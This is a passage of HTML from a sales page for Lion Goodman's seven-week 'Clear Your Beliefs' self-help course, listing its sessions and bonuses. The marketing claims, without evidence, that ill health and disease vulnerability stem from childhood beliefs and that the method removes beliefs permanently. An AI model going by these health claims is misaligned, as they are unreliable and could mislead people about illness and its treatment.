src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<p><li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li></p>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete 